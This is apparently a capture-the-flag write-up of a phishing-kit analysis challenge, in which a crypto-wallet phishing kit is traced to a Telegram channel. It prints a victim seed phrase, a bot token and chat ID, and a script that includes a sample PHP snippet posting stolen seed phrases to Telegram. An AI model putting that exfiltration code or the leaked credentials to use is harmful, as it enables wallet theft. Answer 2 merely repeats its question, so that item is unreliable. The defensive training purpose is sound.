GrabThePhisher Write-up

Praise be to God, and peace and blessings be upon the Messenger of God, his family and his companions. To proceed:

Instructions:

Scenario:

An attacker compromised a server and impersonated https://pancakeswap.finance/, a decentralized exchange native to BNB Chain, to host a phishing kit at https://apankewk.soup.xyz/mainpage.php. The attacker set it as an open directory with the file name “pankewk.zip”.

Provided with the phishing kit, you, as a SOC analyst, are requested to analyze it and do your threat intel homework.

Link: https://cyberdefenders.org/blueteam-ctf-challenges/grabthephisher/

Medium: https://medium.com/@GLITCHGC/grabthephisher-write-up-b99849f18a73


Questions:

1. Which wallet is used for asking the seed phrase?

After downloading the zip file, you will notice an index.html file; open it.

The answer is the first wallet listed, and it matches the folder named after that wallet inside the zip file.

Answer: Metamask


2. What is the file name that has the code for the phishing kit?

Answer: What is the file name that has the code for the phishing kit?


3. In which language was the kit written?

Answer: PHP


4. What service does the kit use to retrieve the victim’s machine information?

Answer: Sypex Geo


5. How many seed phrases were already collected?

Answer: 3


6. Write down the seed phrase of the most recent phishing incident?

Answer: father also recycle embody balance concert mechanic believe owner pair muffin hockey


7. Which medium had been used for credential dumping?

Answer: Telegram


8. What is the token for the channel?

Answer: 5457463144:AAG8t4k7e2ew3tTi0IBShcWbSia0Irvxm10


9. What is the chat ID of the phisher’s channel?

Answer: 5442785564


10. What are the allies of the phish kit developer?

Answer: j1j1b1s@m3r0


11. What is the full name of the Phish Actor?

Query the Telegram Bot API with the token and chat ID recovered from the kit to get the answers: “https://api.telegram.org/bot5457463144:AAG8t4k7e2ew3tTi0IBShcWbSia0Irvxm10/getChat?chat_id=5442785564”

Answer: Marcus Aurelius


12. What is the username of the Phish Actor?

Answer: pumpkinboii
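The steps behind questions 8 to 12 (pull the bot token and chat ID out of the kit's PHP, build the Bot API getChat request, and read the actor's name and username from the response) can be scripted so the same triage is repeatable on the next kit. The following is an added example written for this write-up, not code from the challenge or from the kit; the PHP snippet, the token, the chat ID and the getChat response are all constructed placeholders in the same format as the real values, and it runs offline against that embedded sample data.

```python
import json
import re
from urllib.parse import urlencode

# Constructed sample of the kind of exfiltration code a PHP phishing kit
# contains. It is not the kit from the challenge; the token and chat_id
# are placeholders in the same format as real Telegram values.
SAMPLE_KIT_PHP = r'''<?php
$token = "1234567890:AAExampleTokenConstructedForDemo000";
$chat_id = "1122334455";
$msg = "Wallet: " . $_POST['wallet'] . "\nSeed: " . $_POST['seed'];
file_get_contents("https://api.telegram.org/bot" . $token . "/sendMessage?" .
    http_build_query(["chat_id" => $chat_id, "text" => $msg]));
'''

# Constructed sample of what the Bot API's getChat method returns for a
# private chat (field names follow the public Bot API documentation).
SAMPLE_GETCHAT_RESPONSE = json.dumps({
    "ok": True,
    "result": {
        "id": 1122334455,
        "first_name": "Example",
        "last_name": "Actor",
        "username": "example_handle",
        "type": "private",
    },
})

# A Telegram bot token is the numeric bot id, a colon, and a 35-character secret.
TOKEN_RE = re.compile(r"\b(\d{8,10}:[A-Za-z0-9_-]{35})\b")
# The chat id is normally assigned to a variable right next to the token.
CHAT_ID_RE = re.compile(r"""chat_id\s*=\s*["']?(-?\d{5,})""")


def extract_telegram_iocs(source: str) -> dict:
    """Pull the bot token and chat_id out of phishing-kit source text (Q8, Q9)."""
    token = TOKEN_RE.search(source)
    chat = CHAT_ID_RE.search(source)
    return {
        "bot_token": token.group(1) if token else None,
        "chat_id": chat.group(1) if chat else None,
    }


def get_chat_url(bot_token: str, chat_id: str) -> str:
    """Build the Bot API getChat request the write-up queries for Q11 and Q12."""
    query = urlencode({"chat_id": chat_id})
    return f"https://api.telegram.org/bot{bot_token}/getChat?{query}"


def parse_get_chat(body: str) -> dict:
    """Reduce a getChat JSON response to the identity fields worth recording."""
    data = json.loads(body)
    if not data.get("ok"):
        raise ValueError(f"Bot API error: {data.get('description', 'unknown')}")
    result = data["result"]
    name_parts = (result.get("first_name"), result.get("last_name"))
    return {
        "full_name": " ".join(part for part in name_parts if part),
        "username": result.get("username"),
        "chat_id": result.get("id"),
    }


if __name__ == "__main__":
    iocs = extract_telegram_iocs(SAMPLE_KIT_PHP)
    print("IoCs from kit:", iocs)
    print("Request to send:", get_chat_url(iocs["bot_token"], iocs["chat_id"]))
    print("Actor identity:", parse_get_chat(SAMPLE_GETCHAT_RESPONSE))
```

The token regex is deliberately tight (bot id, colon, exactly 35 secret characters) so it does not match random base64 in the kit; the chat ID regex only looks at the assignment, not the later `http_build_query` call. Record the token and chat ID as IoCs alongside the actor's name and username, since the same Telegram channel often receives data from several kits.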


You Can Find me Here!

Blog: https://g1it0h.gitbook.io/glitch/

Linkedin: https://www.linkedin.com/in/glitchgc/

Facebook: https://www.facebook.com/GLITC.GC/

Tryhackme: https://tryhackme.com/p/GLITCH1GC
